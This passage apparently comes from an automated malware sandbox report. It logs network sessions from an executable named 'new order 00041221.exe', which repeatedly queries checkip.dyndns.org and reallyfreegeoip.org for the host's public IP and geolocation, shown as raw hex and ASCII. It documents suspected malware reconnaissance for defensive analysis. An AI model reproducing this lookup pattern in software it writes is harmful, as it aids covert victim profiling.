                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                          Jul 26, 2024 09:03:14.185848951 CEST730INHTTP/1.1 502 Bad Gateway
                                          Date: Fri, 26 Jul 2024 07:03:13 GMT
                                          Content-Type: text/html
                                          Content-Length: 547
                                          Connection: keep-alive
                                          X-Request-ID: a3f7163b6b7b98234329adf6a7a6dd02
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.749711193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:14.186454058 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:16.051285028 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:15 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 7e66601a04b3ca8c663f0f89844bbb2b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.749713193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:16.791847944 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:19.046257019 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:18 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: c433cb32213b27bced85e6c7690a7e15
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.749715193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:19.643990040 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:22.177618027 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:22 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: bad16ef1c39a0358339d7fbc0cf3320f
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.749718193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:22.834057093 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:23.482217073 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:23 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 2b16581569354b0fb4a31ffa5dc1ea7f
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.749722193.122.6.168805292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 26, 2024 09:03:24.147607088 CEST151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jul 26, 2024 09:03:26.356765985 CEST320INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:26 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 6fca81094665b7ca7a73719ee3da7999
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749703188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:07 UTC704INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:07 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: EXPIRED
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo6T9Xk%2FbanT8mJ%2B%2Bozmxss9QR0BU0tCU38%2FIocpTwcY1HzMI35J9KEuyQT47wA2B5ZkK1lZSebjKU%2FGj%2F8yVNnA4jY31X2O9gZWjhnbkYkX9lx9WceHzgkyoiTIlDd9ighI0yVP"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287304cc44217-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.749706188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-26 07:03:09 UTC706INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:09 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 2
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Fix3PF3YvxGDG4zP5L6TTvFBayGUAKKt6lWLNWhxvZ8xVqPruun9IYlEzTen%2FnZ35b%2BWCt%2Bgtg5NIoJTtOoGthUBId0cHsXR%2BsU6t9ORoNER0teUR6yuyxXv1btCc2scjctiY9h"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92873e9c4d7287-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.749709188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:11 UTC708INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:11 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 4
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVW56dG6%2BLE9l00J3Atql%2Bw%2F1wQDKDdS9F5qpKHzm2sORhq4q64cY96EpxFNu%2BxJ%2BaRtguc6NDZ9JICtNXrsxtM7mLCFB1rAB0lCI7SZOjELvjlvWuE%2FGO9oSJRdGlTdQNef1MVf"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a928746ba134276-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.749712188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:16 UTC702INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:16 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 9
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQmK01iuCwA116GaIi3A%2FhwASAuK2Vws9RXI0McMqQBWWSInGuTirLZd9y35zREowxrP1II%2BAL2c4pkF0NzbVmkZIcKRY5asucDq%2FYOt71aC9NDijnLaxBZ71Ir0Ojd6VbAeQ6VQ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a9287691ce60f4d-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.749714188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:19 UTC709INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:19 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 12
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlMHoaSH9TZgdldk%2Bymv2F1Ny60KsNGOKrSv%2BAk2WlH3IZ%2FO%2Fqo3tBw60HlRcuqccGze7EpjBIT8%2BWrVUurLBhkDz4tjaxZ%2Fs4uzkSOzNVLJcFpF347Qx2D8SOio2pCMleH7iTQU"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92877b4fa9558a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.749716188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-26 07:03:22 UTC703INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:22 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 15
                                          Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4h3kqlRWGDe1EdpvTckYuPvI4GC9W9zRp1UMBSH1%2Ff5MibUc5pDm4IOQQ5%2BPNrsF%2FUt2XtIQTrvrclXlH5I9U6Jr0PJFtRpYgQjt8kOejcSHmbR0MLC1G9B6QZsZyKDCVY7pQ54p"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a92878f188bc457-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-26 07:03:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-26 07:03:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.749720188.114.97.34435292C:\Users\user\Desktop\new order 00041221.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-26 07:03:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-26 07:03:24 UTC713INHTTP/1.1 200 OK
                                          Date: Fri, 26 Jul 2024 07:03:24 GMT
